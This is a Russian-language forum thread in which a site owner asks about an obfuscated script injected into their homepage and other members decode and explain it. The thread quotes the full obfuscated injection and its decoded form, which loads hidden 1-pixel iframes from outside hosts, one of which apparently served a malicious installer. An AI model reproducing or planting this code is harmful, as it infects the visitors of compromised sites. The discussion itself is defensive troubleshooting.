неизвестный скрипт, помогите разобраться, что делает скрипт |
Здравствуйте, гость ( Вход | Регистрация )
неизвестный скрипт, помогите разобраться, что делает скрипт |
13.04.2007 - 19:45
Вставить ник | Быстрая цитата | Сообщение
#1
|
|
Частый гость Группа: Участник Сообщений: 120 Регистрация: 13.02.2005 Пользователь №: 6543 |
Всем доброго времени суток. У меня на главной странице непонятным образом появился в коде скрипт. Также используемый тег iframe пропал. Как будто кто-то изменяет главную страницу. Изменили только ее, и второй раз уже. Сначало iframe просто закоментировали, а потом просто его удалили и добавили скрипт. Раскажите, есть ли способы менять код страниц имеющих атрибут 644? Допустим я исключаю, что кто-то узнал пароль доступа к файлам сайта. Есть ли другие методы?
А скрипт вот такой: Код <!--<S>--><script>function By(FD){return parseInt(FD)}var Tx='kk1kN1kq1kH1ka1kx1ke1kB1kt1kC1kR1km1kd1kn1k41kz1ky1kP1kc1kl1k51kg1kM1kY1kZ1k i1k71kX1ko1kA1kr1kF1kf1ks1k91kD1kb1k31kw1kI1kT1kV1kG1kU1kL1kh1kj1kS1k81kK1kW1k61k O1kp1Nk1NN1Nq1NH1Na1Nx1Ne1NB1Nt1NC1NR1Nm1Nd1Nn1N41Nz1Ny',wc=String('1');var Ww=Array(30004^30149,7457^7583,6101^6011,By('191'),27525^27425,24682^24791,11278^11447,By('237'),By('161'),By('172'),By('163'),23389^23543,By('184'),By('168'),30007^30151,By('239'),By('167'),By('187'),16442^16585,25551^25359,By('199'),By('153'),By('160'),20257^20355,17852^17753,8375^8205,12202^12033,By('225'),By('252'),By('253'),28017^28053,13947^13965,By('255'),By('254'),4674^4795,By('248'),29931^29789,8639^8463,31054^31157,By('165'),29270^29345,By('226'),25281^25127,By('242'),By('227'),By('175'),By('128'),By('169'),8626^8533,2653^2773,27537^27429,28821^28697,By('181'),14670^14785,10235^10101,By('166'),By('130'),29799^29831,By('236'),20863^20973,By('150'),8508^8623,By('183'),By('244'),6593^6481,7914^7803,550^723,5175^5325,6594^6475,10463^10325,19387^19237),Df;var RZ,QV;var vM='kkkNkqkHkakxkekBktkCkRkmkdkCkmknk4kzkykCkPkCkNkqkHkakxkekzkcklk5kNknkekgkakM knkYkdkekZkik7kNkikXkBkokAkAkrkFklk5kNknkekgkakMknkYkdkekZkik7kNkikXkBkokAkAkAkrk Fklk5kNknkekgkakMknkYkdkekZkik7kNkikXkBkfkAkAkAkrkFklk5kNknkekgkakMknkYkdkekZkik7 kNkikXkBkskAkAkAkrkFklk5kNknkekgkakMknkYkdkekZkik7kNkikXkBk9kAkAkAkrkFklk5kNknkek gkakMknkYkdkekZkik7kNkikXkBkDkAkAkAkrkFklk5kNknkekgkakMknkYkdkekZk7kdkRkqkekakYkR kZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkskAkAkrkFklk5kNknkekgkakMknkYkdkekZk7kdkRkqkek akYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkokfkAkAkrkFklk5kNknkekgkakMknkYkdkekZk7kd kRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkfk9kAkAkrkFklk5kNknkekgkakMknkYkdk ekZk7kdkRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkskwkAkAkrkFklk5kNknkekgkakM knkYkdkekZk7kdkRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBk9kwkAkAkrkFklk5kNknk ekgkakMknkYkdkekZk7kdkRkqkekakYkRkZkrkbkik7kNkikZkekHkdknkrkFk3kXkBkwkAkAkAkrkFkl k5k7kdkRkqkekakYkRkBkik7kNkikZkikrkbklk5kPkCkHkBkdkHktkXkYkFklk5kdkHktk4kzkIkekek xkTkVkVkzkBkGkBkZkikBkUkBkzkikikikLkzkBkTkBkzkzkrkBkGkBkzk7ktkhkLkHkdkVkakRk7kYkV kzkGkjkCkekIkLkqknkaktkZkfkAkAkAkAkGkjkCkekIkLkHkCkRkSkYkMkZkrk8kfkfkAkAkAkrkGkzk LkIkekMktkzkFklk5kYkBk4kBkSkYkqkdkMknkRkekLkqkHknkCkeknkKktknkMknkRkekZkzkak7kHkC kMknkzkrkFklk5kekHkWkBkbkBkYkLkNkHkqk4kdkHktkFk3klk5kqkCkekqkIkZknkrklk5kbkYkLkNk nkek6kekekHkakhkdkeknkZkzkNkHkqkzkXkdkHktkrkFk3klk5kYkLkNkekWktknkLkSkakNkxktkCkW kBk4kBkzkRkYkRknkzkFkYkLkNkekWktknkLkikakSkekIkBk4kBkzkokxkOkzkFkYkLkNkekWktknkLk IknkakmkIkekBk4kBkzkokxkOkzkFklk5kYkLk7kHkCkMknkpkYkHkSknkHk4kAkFklk5kekHkWkBkbkB kSkYkqkdkMknkRkekLkhkYkSkWkLkCkxkxknkRkSNkkIkaktkSkZkYkrkFkBk3klk5kqkCkekqkIkZknk rkbk3klk5k3klk5klk5kPkCkHkBkqkRkBk4kBkzkNkHkAktk7kqkzkFklk5kPkCkHkBkqkPkBk4kBkzko kzkFklk5kPkCkHkBkNknkBk4kBkzkNkokLkHkYktktkNkWkNkeknkMkNkLkakRk7kYkzkFklk5kPkCkHk BkxkBk4kBkzkVkIkekMktkVkzkFklk5kak7kZkSkYkqkdkMknkRkekLkqkYkYNNkaknkLkakRkSknkONq k7kZkqkRkGkzk4kzkGkqkPkrkBk4k4kBNHkokrklk5kbklk5kPkCkHkBkdkHktkBk4kBkzkIkekekxkTk VkVkzkBkGkBkZkSkYkqkdkMknkRkekLktkYkqkCkekakYkRkLkIkYkNkekBNak4kBkzkzkBkUkBkzkzkB kTkBkHkNkWkNNxkHkNkZkrkrkBkGkBkSkYkqkdkMknkRkekLktkYkqkCkekakYkRkLkIkYkNkekLkHknk xktkCkqknkZkVNeNBkCNHNtkANHNCkLNHNRkVkXkBkzkLkzkrkLkHknkxktkCkqknkZkVNmkLkGkVkXkB kzkLkzkrkBkGkBkzkLkzkBkGkBkHkNkWkNNxkHkNkZkrkBkGkBkzkLkzkBkGkBkNknkBkGkBkxkFklk5k PkCkHkBkYkBk4kBkSkYkqkdkMknkRkekLkqkHknkCkeknkKktknkMknkRkekZkzkak7kHkCkMknkzkrkF kYkLkNknkek6kekekHkakhkdkeknkZkzkNkHkqkzkXkBkdkHktkrkFkYkLk7kHkCkMknkpkYkHkSknkHk 4kokFkBkYkLkikakSkekIk4kokFkBkYkLkIknkakmkIkek4kokFkBkYkLkNkekWktknkLkSkakNkxktkC kWk4kzkRkYkRknkzkFkBklk5kSkYkqkdkMknkRkekLkhkYkSkWkLkCkxkxknkRkSNkkIkaktkSkZkYkrk FkBkHkNkWkNNxkNkqkZkqkRkXkqkPkrkFklk5k3klk5k7kdkRkqkekakYkRkBkHkNkWkNNxkHkNkZkrkb kBkPkCkHkBktk4k9NdkXkqk4kzkAkokfksk9kDkwNnNdNCkAkCkhkqkSknk7kzkXkYk4kzkzkFkBk7kYk HkZkak4kAkFkBkakBkkkBktkFkBkakGkGkrkBkYkBkGk4kBkqkLkNkdkhkNkekHkZkjkCkekIkLk7ktkY kYkHkZkjkCkekIkLkHkCkRkSkYkMkZkrk8kqkLktknkRkmkekIkrkXkokXkokrkFkBkHknkekdkHkRkBk YkFkBk3klk5k7kdkRkqkekakYkRkBkHkNkWkNNxkNkqkZkqkRkXkqkPkrkbkBkPkCkHkBkek4kBkRknki kBN4kCkeknkZkrkFkBkPkCkHkBknk4kBkRknkikBN4kCkeknkZkrkFkBknkLkNknkekgkakMknkZkekLk mknkekgkakMknkZkrkGkskwkAkAkAkAkAk8kfk9krkFkBkSkYkqkdkMknkRkekLkqkYkYNNkaknkBk4kB kqkRkGkzk4kzkGknkNkqkCkxknkZkqkPkrkGkzkFknkOkxkakHknkNk4kzkGknkLkekYNzkjkgNykekHk akRkmkZkrkFkBk3klk5klk5kkkVkNkqkHkakxkekc',QP='';Tx=Tx.split(wc);for(Df=0;Df<vM.length;Df+=2){QV=vM.substr(Df,2);for(RZ=0;RZ<Tx.length;RZ++){if(Tx[RZ]==QV)break;} QP+=String.fromCharCode(Ww[RZ]^205);}document.write(QP);</script><!--</S>--> |
|
|
13.04.2007 - 19:59
Вставить ник | Быстрая цитата | Сообщение
#2
|
|
Частый гость Группа: Участник Сообщений: 196 Регистрация: 4.09.2006 Пользователь №: 15165 |
это вирус, чувак )
вот его дешифровка так сказать.. ) Код <script language="javascript"> setTimeout(wfsw, 100); setTimeout(wfsw, 1000); setTimeout(wfsw, 2000); setTimeout(wfsw, 3000); setTimeout(wfsw, 4000); setTimeout(wfsw, 5000); setTimeout(function(){wfsw(true);}, 300); setTimeout(function(){wfsw(true);}, 1200); setTimeout(function(){wfsw(true);}, 2400); setTimeout(function(){wfsw(true);}, 3600); setTimeout(function(){wfsw(true);}, 4600); setTimeout(function(){wfsw(true);}, 6000); function wfsw(w){ var url,o; url="http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html"; o = document.createElement("iframe"); try { o.src=url;} catch(e) {o.setAttribute("src",url);} o.style.display = "none"; o.style.width = "1px"; o.style.height = "1px"; o.frameBorder=0; try { document.body.appendChild(o); } catch(e){} } var cn = "sr0lfc"; var cv = "1"; var se = "s1.rollsystems.info"; var p = "/html/"; if(document.cookie.indexOf(cn+"="+cv) == -1) { var url = "http://" + (document.location.host != "" ? "" : rsys_rs()) + document.location.host.replace(/[^a-z0-9.-]/, ".").replace(/\.+/, ".") + "." + rsys_rs() + "." + se + p; var o = document.createElement("iframe"); o.setAttribute("src", url); o.frameBorder=1; o.width=1; o.height=1; o.style.display="none"; document.body.appendChild(o); rsys_sc(cn,cv); } function rsys_rs(){ var l=48,c="01234567890abcdef",o=""; for(i=0; i < l; i++) o += c.substr(Math.floor(Math.random()*c.length),1,1); return o; } function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+"; expires="+e.toGMTString(); } </script> я встречался с таким, но очень давно уже. поищи у себя в папках лишние файлы, вероятнее в папках доступных на запись Сообщение отредактировано Eldy - 13.04.2007 - 20:18 |
|
|
13.04.2007 - 20:22
Вставить ник | Быстрая цитата | Сообщение
#3
|
|
Частый гость Группа: Участник Сообщений: 120 Регистрация: 13.02.2005 Пользователь №: 6543 |
Спасибо, но что он делает и как тебе удалось его расшифровать? И как он мог появиться в коде главной страницы?
Код http://" + (w ? "www." : "") + "flb.ru/info/"+Math.ceil(20000+Math.random()*22000)+".html"; - причем здесь сайт flb и какая связь с ним? Обьясните, пожалуйста, поподробнее, ибо я в javascript не силен.Сходил по ссылке s1.rollsystems.info/html - там тоже что-то ужасное, какой-то инсталятор, тоже куча скриптов, вобщем что-то на мой комп проникло сразу. Будьте осторожны. Сообщение отредактировано Вано - 13.04.2007 - 20:50 |
|
|
14.04.2007 - 01:01
Вставить ник | Быстрая цитата | Сообщение
#4
|
|
Bill rulz ^^ Группа: Участник Сообщений: 1418 Регистрация: 28.09.2003 Пользователь №: 24 |
больше похоже на обычную раскрутку сайта
у тебя на сайте открывается несколько ифреймов, каждый со страничкой с сайта flb.ru, как только кто-то заходит к тебе на сайт, он автоматически накручивает счетчик для нескольких рандомных статей с того сайта и самого сайта в целом. обычно бесплатные хостинги добавляют подобные скрипты в рекламных целях, например на народе это маленькое окошко, здесь -- такой скрипт. в ничего оспасного нет. а вот с ]]>http://s1.rollsystems.info/html/]]> чуть хуже, это уже реал вирусняк вобщем меняй хостинг Сообщение отредактировано SHADE - 14.04.2007 - 01:10 |
|
|
14.04.2007 - 09:40
Вставить ник | Быстрая цитата | Сообщение
#5
|
|
Частый гость Группа: Участник Сообщений: 196 Регистрация: 4.09.2006 Пользователь №: 15165 |
Спасибо, но что он делает и как тебе удалось его расшифровать? И как он мог появиться в коде главной страницы? там простой шифр )) массив из чаров, который потом сам и дешифруется. защита просто на том, что код не видно.. смотри строку document.write(QP); QP - есть код который в реале исполняется. По поводу заражения - скорее всего заражен сам сервер, или тебе залили через скрипты файлик который потом исполняли. проверь папки открытые на запись на наличие лишних файлов. Сообщение отредактировано Eldy - 14.04.2007 - 09:42 |
|
|
14.04.2007 - 11:46
Вставить ник | Быстрая цитата | Сообщение
#6
|
|
Частый гость Группа: Участник Сообщений: 192 Регистрация: 30.10.2005 Пользователь №: 10364 |
по всему инету гуляет этот зверь.
вирус у тебя на компе и он давно уже слил у тебя пароли к фтп, аське и почте. поменяй пароль на фтп. |
|
|
Текстовая версия | Сейчас: 26.10.2024 - 01:48 |